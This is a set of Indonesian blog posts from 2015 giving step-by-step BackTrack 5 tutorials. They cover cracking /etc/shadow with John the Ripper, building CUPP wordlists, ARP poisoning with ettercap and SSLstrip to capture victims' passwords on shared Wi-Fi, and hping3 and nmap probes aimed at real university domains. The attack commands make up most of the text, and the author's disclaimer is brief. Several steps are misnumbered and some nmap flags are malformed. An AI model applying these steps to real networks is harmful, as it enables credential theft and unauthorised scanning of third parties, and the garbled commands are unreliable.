Minggu, 26 April 2015

offline password attack menggunakan CUPP.PY

baiklah saya akan memberikan toturial tentang offline password attack menggunakan JOHN THE RIPPER pada os backtrack 5 r3
sebelum kalain coba pastikan anda terinstal terlebih dahulu os backtrack 5 r3 atau dengan bantuan vmware / virtual box


oke langsung aja yah kita coba peratikan perintah dan gambar
langkah pertama ketikan cd /pentest/passwords/cupp



langkah kedua ./cupp.py -l
langkah ketiga pilih no 5 lihat gambar
setelah diketik no 5 enter dan ketikan perintah ./cupp.py -i
setelah itu masukan nama anda nama panggilan dan seterusnya kalau belum paham lihat gambar
selanjutnya masukaan perintah nano misalanya suhardi.txt (ingat untuk nama sesuai dengan nama kalian itu sebagai contoh



lalu enter setelah nama kalian dsni saya ambil contoh nama orang lain yaitu junimanullah.txt
untuk mengetahuinya enter aja setelah nama kalian lihat gambar















Sabtu, 25 April 2015

toturial offline password menggunakan John The Ripper. dengan backtrack

baiklah langkah yang pertam ahrus kita lakukan adalah instal os backtraack 5 r3
lalu buka terminal deng cara cepat ctrl+alt+t
llau ketikan perinta sebagai berikut
cd /pentest/passwords/john
lalu ketikan perintah selajutnya adalah cat /etc/shadow lihat gambar
netx ketik perintah ./unshadow /etc/password /etc/shadow > backtrack.txt
lalau ketikkan lagi perintah ls
selanjutnya perintah cat backtrack.txt
john backtrack.txt
lalau terakhir perintah john --show backtrack.txt


itu cara menggunakan offfinle password attack dengan menggunakan John The Ripper.
selamat mencoba tujuannya adalah untuk mencari pass yang lupa 

Kamis, 16 April 2015

toturial arp poisoning ettercap

baikalah saya akan menjelaskan tentang teknik arp poisoning ettercap
langkah awal yang harus kita lakukan koneksi kan komputer atau netbook kalaian
buka backtarack 5 R3
lalu buka terminal dgn cara ctrl+alt+T
ok
langkah pertama perhatikan gambar
ketik gedit /etc/etter.conf lalu enter

 langkah kedua akan tampil seperti gamabr dibawah ini hapus tanda # yang ada di depan redir blalalalalla dan hapus juga yang kedua dengan tulisan yang sama redir balalal lalu save dan close
 ini yang saya sudah hapus
 langkah ketiga ketik if config catat ip nya
 langkah keempat ketik ettercap -T -q -i wlan0 -M ARP // // lalu enter
 dan hasilnya sebagai berikut ,   tunggu sampai target login dan kita akan mendapatkan pass
 dan hasilnya jerengngngnngngng si korban terlihat pass dan nimnya nampak digambar bawah ini
 selanjut kita coba cara yang dengan cara buka terminal  baru cara cepat ctrl+alt+t sudah terbuka ketik ettercap -G maff penulis lupa print scree dan bila akan tampil gambar

selanjutnya arahkan cursor anda ke unifeed snaffing selanjut akan tampil ettercap input lalu kita ubah menjadi wlan0 ok
selanjutnya arahkan cursor anda ke Host pilih tools host list lalu pilih lagi tools scan for hosts akan tampil ip seperti gambar dibawah ini
 langkah selanjutnay arahkan anda ke mitm pilih tools Arrp poisoning lalu akan tampil seperti gambar ada du pilihan lihat gambar aja atau cetang only poison one-way
 selanjutnya kita arahkan cursor ke tepi kanan pilih tools start lalu pilih tools start snaffing atau perintah lain ctrl+w tunggu si target  login dan hasil akan tampil password korban lihat gamabr dibawah
 sekian dulu toturial dari saya semoga bermanfaat ilmu yang saya bagikan aminnnn ingat jangan digunakan untuk jahili teman anda atau merugikan orang lain ok brooooooooooooooooooooo

toturial arp spoof sslstrip

baikalah saya akan menjelaskan tentang teknik arp spoof sslstrip
langkah awal yang harus kita lakukan koneksi kan komputer atau netbook kalaian
buka backtarack 5 R3
lalu buka terminal dgn cara ctrl+alt+T
ok
langkah pertama perhatikan gambar
ketik ifconfi dan catata ipa addressnya
 langkah kedua lihat gambar echo "1" > /proc/sys/ipv4/ip_forward
 langkah ketiga liha gambar iptables -t nat -A PREROUTING -p tcp --destination-port 80-j REDIRECT --to-port 8080 entet
 langkah keempat lihat gamabr  hanya jalan saja netx saja ke no 5
  langkah kelima lihat gamabr netdiscover -i wlan0  -r 192.168.43.1/24
  langkah keenam lihat gamabr terlihat ip
  langkah ketujuh lihat gamabr sslstrip  -w hacking (terserah nama anda juga tidak maslah)  -l 8080 (ingat L hurup kecil bkn 1) dan kita tnggu si target login ke wifi yang kita pakai
  langkah kedelapan lihat gamabr kita ketikan cat hacking sesuai nama yang anda tuliskan dan terlihat kan sitarget login yg saya blog
  langkah kesembilane lihat gamabr ini hanya sambungan di no 8
sekian dulu ilmu yang saya bagikan semoga bermanfaat bagi kita semua (pembuat tidak mengajurkan untuk kejahatan)

Minggu, 05 April 2015

Troturial Hping3 Dengan Backtrack 5 r3
Langkah Pertama : root@bt : ping www.binadarma.ac.id


Langkah Kedua  root@bt : hping3 S binadarma.ac.id –p 80
Langkah Ketiga  root@bt : hping3 –S binadarma.ac.id –p  -T


Langkah Terakhir : root@bt : hping3 --help

<$ � � x1 MsoNormal>

Langkah ketujuh  ketikan perintah root@bt : -# nmap -sn unsri.ac.id

Langkah kedelapan ketikan perintah root@bt : -# nmap -sn unsri.ac.id

Langkah kesembilan  ketikan perintah root@bt : -# nmap  -sP unsri.ac.id

Langkah kesepuluh  ketikan perintah root@bt : -# nmap -PR unsri.ac.id

Langkah kesebelas  ketikan perintah root@bt : -# nmap  -sS unsri.ac.id

Langkah keduabelas  ketikan perintah root@bt : -# nmap -sT unsri.ac.id

Langkah ketiga  ketikan perintah root@bt : -# nmap –p21,3128 unsri.ac.id

Langkah ketiga  ketikan perintah root@bt : -# nmap ­“*” unsri.ac.id

Langkah ketiga  ketikan perintah root@bt : -# nmap –pT unsri.ac.id

Langkah ketiga  ketikan perintah root@bt : -# nmap –pV : 1000-2000 unsri.ac.id

Langkah ketiga  ketikan perintah root@bt : -# nmap –sT –pN –spoof –mac unsri.ac.id

Langkah ketigabelas  ketikan perintah root@bt : -# nmap  0N hasil.txt unsri.ac.id